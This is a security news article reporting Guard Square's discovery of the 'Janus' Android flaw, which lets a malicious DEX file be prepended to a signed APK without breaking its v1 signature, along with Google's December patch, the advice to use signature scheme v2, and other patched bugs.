Android bug lets attackers modify signed code

Researchers have discovered a new vulnerability in Google's Android that lets attackers add malicious code to existing files thanks to a flaw in the digital signature checking process.

Security vendor Guard Square found Android application package (APK) files and Dalvik executable format (DEX) files are not checked properly by the operating system, which can confuse the two different types of data.

"The root of the problem is that a file can be a valid APK file and a valid DEX file at the same time," the firm said. Guard Square named the vulnerability Janus, after the two-faced Roman god, as a nod to the duality issue.

Versions of Android from 5.0 only check certain bytes in applications' signatures, allowing attackers to sneak malware past the operating system's signature checking.

Attackers could prepend malicious DEX files to APKs without disturbing the latter's digital signature.

Android accepts the APK file as legitimate because the signature checks out, allowing an attacker to run the malicious DEX file in the Dalvik virtual machine.

The vulnerability could be used to replace trusted Android system applications with high and third-party privileges for full device compromises, Guard Square said.

Developers should always apply the newer Android signature scheme version 2 to protect against Janus. The newer signature scheme appeared in Android 7.0 and checks all bytes of an application package file, unlike the v1 predecessor.

Guard Square said the flaw has not been exploited in the wild yet. Google patched it in its December security bulletin.

The bulletin contains patches for five critical remote code execution flaws in the Android media framework, which has been a source of multiple serious vulnerabilities in the mobile operating system.

Google also issued patches for a critical bug - CVE-2017-14907 - that weakened storage encryption on its Pixel and Nexus handsets.